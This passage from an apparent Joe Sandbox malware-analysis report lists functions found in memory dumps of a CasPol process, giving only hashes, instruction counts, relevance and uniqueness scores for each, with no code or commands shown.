                                        • Opcode Fuzzy Hash: 54bd70ac75f90181b180a34480618d1481764a45f313d518b2af4b9a7e067e32
                                        • Instruction Fuzzy Hash: 78D1C134B04209CFCB59DF68C584AADBBB2EF88314F158569E915EB3A5CB34DC41CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01154A7E Relevance: .3, Instructions: 263COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cc21adb0bdc9bef439893610a5ad7081c03bfbe243c8a4ef5938835e6314fa06
                                        • Instruction ID: d3e2cc2fa26c8ef5894c405e76affef9309f319fb9c83f14a0c4726d2f9d9954
                                        • Opcode Fuzzy Hash: cc21adb0bdc9bef439893610a5ad7081c03bfbe243c8a4ef5938835e6314fa06
                                        • Instruction Fuzzy Hash: B0B17F70E00209CFDB58CFA9D8957EDBFF1AF89314F148129D825E7694EB749885CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01153E64 Relevance: .2, Instructions: 236COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6951cff3224c685abd78afa871062d98dfa34f525eaa0fb6d822551cb23f69b2
                                        • Instruction ID: 085fcb9f70e6157be0783011179701ea6f0a084caed15bbbed3a97f550ac7d65
                                        • Opcode Fuzzy Hash: 6951cff3224c685abd78afa871062d98dfa34f525eaa0fb6d822551cb23f69b2
                                        • Instruction Fuzzy Hash: F3918070E00209CFDB58CFA8D9857DDBFF2BF48354F248129E865A7294E7749885CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01156CCC Relevance: .1, Instructions: 136COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c28de67a02f7441574e62af0c5844d4493c1047d4f89029ccdb711ba0ad96ec
                                        • Instruction ID: bec6e320eedf9b1f8edc2803dcbba7ce8a6dbbc7f13f0f3a2ba3e2658a40eaac
                                        • Opcode Fuzzy Hash: 0c28de67a02f7441574e62af0c5844d4493c1047d4f89029ccdb711ba0ad96ec
                                        • Instruction Fuzzy Hash: 5C512470E00268CFDB58CFA9C8847ADBBB1FF48300F548529D825BB395D7749880CB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01156CD8 Relevance: .1, Instructions: 132COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 02059ee7ead0dbf35bd5567654486728b0f3c148af7b30aa86761d8f428b2bd3
                                        • Instruction ID: 4bb3d2249535915714ec97f4bd6ee164026b1ed34b702f5262de6227bd321988
                                        • Opcode Fuzzy Hash: 02059ee7ead0dbf35bd5567654486728b0f3c148af7b30aa86761d8f428b2bd3
                                        • Instruction Fuzzy Hash: 01510570D00268CFDB58CFA9C8847ADBBB5FF48310F548519D825BB395D774A844CB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0115F2D0 Relevance: .1, Instructions: 95COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 00367bd1fae32e35b38dfcf9a8e8a2bd3e39deba3baddd5bb3ee7c993997392c
                                        • Instruction ID: 62e99030a412c360d651d85fafc7d397b0d7aecb0fd824b8c3dac721b5f05506
                                        • Opcode Fuzzy Hash: 00367bd1fae32e35b38dfcf9a8e8a2bd3e39deba3baddd5bb3ee7c993997392c
                                        • Instruction Fuzzy Hash: 46317431E08206DBDB59CF69C85469EB7F2BF89300F108519EC16EB355DB74AC46CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 011526CE Relevance: .1, Instructions: 93COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6f92c58d54d4c7fea1921e28951ac106534c4f9f47db3e4afab93bfe32270060
                                        • Instruction ID: d3847320b595eeba10e76a933e523952de141a2bbf976cd956ee7986e1b496d6
                                        • Opcode Fuzzy Hash: 6f92c58d54d4c7fea1921e28951ac106534c4f9f47db3e4afab93bfe32270060
                                        • Instruction Fuzzy Hash: 5B41F1B1900348DFDB14CF99C984ADEBFF5EF48314F208429E819AB254DB79A946CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0115F2E0 Relevance: .1, Instructions: 91COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 44e1c6316db1eab035422f4cb064c4510c8c937041d341ec1ff22a56daaf8e40
                                        • Instruction ID: 883d59a01f8865ab9a79f04e00877f70535edd32c8ddf2a7f0d0f726b16c2ef9
                                        • Opcode Fuzzy Hash: 44e1c6316db1eab035422f4cb064c4510c8c937041d341ec1ff22a56daaf8e40
                                        • Instruction Fuzzy Hash: 8E312130E08606DBDB59DF69C8946AEB7F2BF89300F108919E816E7355DB74EC46CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 011526D8 Relevance: .1, Instructions: 90COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b7c8402d1068b7ada9c5d17438e07e087e9c22fe5405c603fb1fdd9ab33cdd4
                                        • Instruction ID: c690224c9edd1110d6fe9e69b955979601c371649f0428242f7c0abc6290d415
                                        • Opcode Fuzzy Hash: 0b7c8402d1068b7ada9c5d17438e07e087e9c22fe5405c603fb1fdd9ab33cdd4
                                        • Instruction Fuzzy Hash: 6241D1B1D00348DFDB14CF99C584ADEBFF5EF48314F208429E819AB254DB75A946CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0115923F Relevance: .1, Instructions: 84COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 63b79e105978d26addc1d3d0b4b23c342b8bff5cb5ac1a9f5f5169d597d774a1
                                        • Instruction ID: e614039e628f33a098237707fc6ab47c8005f1ec091dcd360265f6ce07dd8210
                                        • Opcode Fuzzy Hash: 63b79e105978d26addc1d3d0b4b23c342b8bff5cb5ac1a9f5f5169d597d774a1
                                        • Instruction Fuzzy Hash: 81318071E0420ADBDB49CFA9C4946DEFBB2BF89304F14861AE815EB291DB709845CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01151370 Relevance: .1, Instructions: 79COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d325b63b14700a64c1f25daeaa3c001b4cec2fe1e43b25b01b9acfe0cc644011
                                        • Instruction ID: a3be23823dcf09ab7ecdfb74eeaba6367db6ff979c113061f81fc03f47dac2b7
                                        • Opcode Fuzzy Hash: d325b63b14700a64c1f25daeaa3c001b4cec2fe1e43b25b01b9acfe0cc644011
                                        • Instruction Fuzzy Hash: AF21C130608641EFDBBB572CC8947693E61EB42215F104CBEEC56DBAA3CB2D8885C742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01159250 Relevance: .1, Instructions: 78COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a8064b0c216dd115621a146ca231577835c658ed7ec92a25fd435a36b48cccdd
                                        • Instruction ID: df0f77dd6cc7990a75ef758e1cce963d766104d6c8790aa089bacc15cb5c2625
                                        • Opcode Fuzzy Hash: a8064b0c216dd115621a146ca231577835c658ed7ec92a25fd435a36b48cccdd
                                        • Instruction Fuzzy Hash: 5C216D70E0420ADBDB49CFA9C4946AEFBB2BF89304F14C619E815FB351EB709845CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010DD4D8 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2752288647.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_10dd000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 87a49527f6bb14d661742f16a0d35136ed415282d418adb1fac0fcda9fe190e0
                                        • Instruction ID: 4ebb23b6ce1901aef5948d3d6d167fa5474905ec5665aad66009f72cdb508546
                                        • Opcode Fuzzy Hash: 87a49527f6bb14d661742f16a0d35136ed415282d418adb1fac0fcda9fe190e0
                                        • Instruction Fuzzy Hash: 9A213A71500304DFDB15CF98D9C0B2ABFA5FB88318F6085ADD9450B29EC336D856CBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010DD3EC Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2752288647.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_10dd000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 67e9857dfaf62fba6dd339e33e7c7423be6655d728dfa78627773130f10375c5
                                        • Instruction ID: f4b6213120d19cff300530b60c4504a9acecab98c2f24a655d0ae3cc442fa692
                                        • Opcode Fuzzy Hash: 67e9857dfaf62fba6dd339e33e7c7423be6655d728dfa78627773130f10375c5
                                        • Instruction Fuzzy Hash: C121F171540304EFDB05DF98D9C0B6ABFA5FB84324F20C5A9D9890B286C736E456CBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01159141 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cb67a392ebdb2b40c17ab005e0de3a079f8826a42e8cedc955c701b1c060afee
                                        • Instruction ID: 10613f521589d216bf1b205accd5f5d6954bb225769947a28c39176ef0c955f8
                                        • Opcode Fuzzy Hash: cb67a392ebdb2b40c17ab005e0de3a079f8826a42e8cedc955c701b1c060afee
                                        • Instruction Fuzzy Hash: 4321C731E04219DBCB09CFA5C4946DEBBB2AF85314F10851EEC22FB381DB709841CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01154F7A Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07aaabe4cd2003e9839945f320cf630b22800e80b6d0ab8d2a8f368cdd739ccd
                                        • Instruction ID: ca45299018ed4658015613f8d8d3fa8b5221a93b37a89751db38b647d469f114
                                        • Opcode Fuzzy Hash: 07aaabe4cd2003e9839945f320cf630b22800e80b6d0ab8d2a8f368cdd739ccd
                                        • Instruction Fuzzy Hash: DA214B34640254CFDB98DB78C559A9D7BF2AF49344F2044ADE806EB3A6DBBA8D00CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01151868 Relevance: .1, Instructions: 74COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b8ea62c535f307a57ee4f5c6193695212a18208ead799c4851be21936e967171
                                        • Instruction ID: 35929f3fc51805e4b827c290325a390a65e95108a67c4e3b2472c5d2c2e75eee
                                        • Opcode Fuzzy Hash: b8ea62c535f307a57ee4f5c6193695212a18208ead799c4851be21936e967171
                                        • Instruction Fuzzy Hash: 9B21A030B00205DFDB6ADB38C5557AD7BF2BF49204F100568C916AB2A1EB368C01CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010ED030 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2752538193.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_10ed000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fe10e1da8c6afcb74b1c36bd381aea5ad9b999ea848438e71dedeb941b492390
                                        • Instruction ID: 694f6ffd8def3141b4759ba36055d93cb65e0c416553f8f73150060a1e2bc022
                                        • Opcode Fuzzy Hash: fe10e1da8c6afcb74b1c36bd381aea5ad9b999ea848438e71dedeb941b492390
                                        • Instruction Fuzzy Hash: 8D213A71504204DFCB15CF59D9C4B16BFE5EB84314F28C5ADE9894B286C336D447CB62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01159150 Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01307162bade6cc42fde84c973cc738d0de0980d45e45b2a9e62b3a52a5705b0
                                        • Instruction ID: 1bab711e8985af68627ae582a579c998b2162f8ea24c906c7b819acd1f95b3f1
                                        • Opcode Fuzzy Hash: 01307162bade6cc42fde84c973cc738d0de0980d45e45b2a9e62b3a52a5705b0
                                        • Instruction Fuzzy Hash: 10216231E04219DBDB19CFA9D89469EB7B2BF89314F20851AEC25BB350EB70A845CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01151878 Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d7f3c004e41e8964253e16a87797fbdfe27338d3188fdf20be6ded322c53dfb9
                                        • Instruction ID: 4dc8a02a7d2d8622791591640d4a9fe3bee19ecd592ed0a9ad4e3c4b2d1f6bd4
                                        • Opcode Fuzzy Hash: d7f3c004e41e8964253e16a87797fbdfe27338d3188fdf20be6ded322c53dfb9
                                        • Instruction Fuzzy Hash: 07213030B00219DFDBADEB78C5557AE7BF2AB49244F100468D916EB350EF369D01CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010ED006 Relevance: .1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2752538193.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_10ed000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1deb1b5bb2ffc0c0616f8f09d12f41ac044517b7fe3de72a8323a81108b11888
                                        • Instruction ID: 69c2383d056103d949f1268e42a1cab3050c537e679b15a89799025bc4343d42
                                        • Opcode Fuzzy Hash: 1deb1b5bb2ffc0c0616f8f09d12f41ac044517b7fe3de72a8323a81108b11888
                                        • Instruction Fuzzy Hash: 0D214B7550D3C09FDB13CB64C994715BFB1AB46214F29C5DBD8888F2A7C23A980ACB62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01154F88 Relevance: .1, Instructions: 68COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 80d849fef153bbf250375acd4554d8dfecce2c8a9497aca4dd9c1483a2757b30
                                        • Instruction ID: acb04f3f622692ad464e1788b2dbc1b859c8b1e3d051b475c7f6a7a84f892ff5
                                        • Opcode Fuzzy Hash: 80d849fef153bbf250375acd4554d8dfecce2c8a9497aca4dd9c1483a2757b30
                                        • Instruction Fuzzy Hash: 7921FA34700214CFDB98DB78C559A9D77F2AF48344F204469E906EB765EB76DD00CB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 011517B0 Relevance: .1, Instructions: 66COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5e2f41ae65cfe5f1fa9873a4a6f20104ef7d61330c57072950236ef09530ce05
                                        • Instruction ID: 0b5dd948564d93483f981b8e58b920e715ad4f9ebe4870651ba15b1fba11d974
                                        • Opcode Fuzzy Hash: 5e2f41ae65cfe5f1fa9873a4a6f20104ef7d61330c57072950236ef09530ce05
                                        • Instruction Fuzzy Hash: A6216D76E15650DFCB62AF78584866E7FB0FF48200B1049BCDD56C3352EB348901CB42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01150848 Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6c43de94ad6cd4e24e53f1514b6e7eb8c290344a8b5632244cfd02dfbfa369f2
                                        • Instruction ID: c727b21739c1b81e4f87ba1706327121ca91e41709b36f94ba80f0abea8e1d2d
                                        • Opcode Fuzzy Hash: 6c43de94ad6cd4e24e53f1514b6e7eb8c290344a8b5632244cfd02dfbfa369f2
                                        • Instruction Fuzzy Hash: 47118F30F00204CBDBAE9ABDC454B6A7651FB49314F108939F926DF256DB69DC418BC5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01151478 Relevance: .1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3829025b139b6f82e29f2f5371703a201ad19db6b56474e323eca1d4ba1c9dd0
                                        • Instruction ID: 581f351a5ef1cbd21a2b5dd91e0a1176abcbc5dc9099339eb04c31971725c0b0
                                        • Opcode Fuzzy Hash: 3829025b139b6f82e29f2f5371703a201ad19db6b56474e323eca1d4ba1c9dd0
                                        • Instruction Fuzzy Hash: 4011BF32E04255DFCB6ADFBC84542AD7FF1AF59214B2504BADC15EB202E732D841CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010DD4D3 Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2752288647.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_10dd000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9c7b2cc930d607bed1866bb99be92b9492de0c21bf00acca2362048428b2d189
                                        • Instruction ID: 6ea379d97f77ada7152fadcae3590484db43f5b679e67d0c455c1d01212afb64
                                        • Opcode Fuzzy Hash: 9c7b2cc930d607bed1866bb99be92b9492de0c21bf00acca2362048428b2d189
                                        • Instruction Fuzzy Hash: EC110372504340CFCB12CF54D5C0B16BFB1FB84314F24C6A9D8490B25AC33AD45ACBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010DD3E7 Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2752288647.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_10dd000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9c7b2cc930d607bed1866bb99be92b9492de0c21bf00acca2362048428b2d189
                                        • Instruction ID: f4b6a006f3ab48257c4d988e4e5ae0e1ab8051023602bf59427b70620dec8230
                                        • Opcode Fuzzy Hash: 9c7b2cc930d607bed1866bb99be92b9492de0c21bf00acca2362048428b2d189
                                        • Instruction Fuzzy Hash: C511E172504340CFCB02CF54D5C0B56BFA2FB84324F24C5A9D8480B656C33AE45ACBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01151488 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a856c41f21132455a8a741bcb2363b482c3c92ac21cf074cf1845013a1bad7ae
                                        • Instruction ID: ba95f5e2e527cb4c4600b74cce93d6696a53d48b7c2baa0855b7e18f0fc8fa43
                                        • Opcode Fuzzy Hash: a856c41f21132455a8a741bcb2363b482c3c92ac21cf074cf1845013a1bad7ae
                                        • Instruction Fuzzy Hash: 6C012D31E00215DFCF6AEFBC84542AD7BE5EB99264B25047AEC15E7201E735E8418B92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01159878 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 707a04dc081b7c0d6ecf45891945541112e135d292eb76f7b5cb3692ccb7f8a4
                                        • Instruction ID: 1898f5f94575cd58f99b869bd71272e5ee58d4971e925f373266f4620f88533c
                                        • Opcode Fuzzy Hash: 707a04dc081b7c0d6ecf45891945541112e135d292eb76f7b5cb3692ccb7f8a4
                                        • Instruction Fuzzy Hash: 2511E531A04349CBDB15DF68D85578ABF71FF85300F5481A8C9885F2AAEB70E905CBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 011580E0 Relevance: .0, Instructions: 40COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: db862c12468c9e3cde5aed0048d7f40f6ccfb2afd73a545f35782a6bb62d47ff
                                        • Instruction ID: f71f2f79978be4e7975ad97fcb29905fff8eaa2e5ed8e74a12fe04b59f10f1dc
                                        • Opcode Fuzzy Hash: db862c12468c9e3cde5aed0048d7f40f6ccfb2afd73a545f35782a6bb62d47ff
                                        • Instruction Fuzzy Hash: 4201843091434A9FCB05EBB8E991BED7FB1EF45204F1042E8C044AB267DE356A05CF45
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01157080 Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3f71d89cde9794a6a3b3193b5a0c2a9edb2af1a2ecb43e9f6002ad434523fae6
                                        • Instruction ID: 05998af9d4a1b598a4ae57d6d1cad9cf1e465be58945b509dfdb31713ed6683d
                                        • Opcode Fuzzy Hash: 3f71d89cde9794a6a3b3193b5a0c2a9edb2af1a2ecb43e9f6002ad434523fae6
                                        • Instruction Fuzzy Hash: 47F0C439B00614CFC718DB78C998B6C77B2FF88615F5144A8E9069B3A1DF35AD42CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 011580F0 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1178c1907bcc73aa3956570ffa1c17dd8e5b07740c1d29819e09efa27d7a93fa
                                        • Instruction ID: d7d66d2bba80d3afdae95973367c0c06d2392ee8068a6e32ac856ef60f8951f7
                                        • Opcode Fuzzy Hash: 1178c1907bcc73aa3956570ffa1c17dd8e5b07740c1d29819e09efa27d7a93fa
                                        • Instruction Fuzzy Hash: 6EF0443094030D9FCB05EBACE950BAE7BB1EB44304F5042A8C048AB365DE316F048F85
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 035EAE77 Relevance: .0, Instructions: 5COMMON
                                        Download Yara Rule
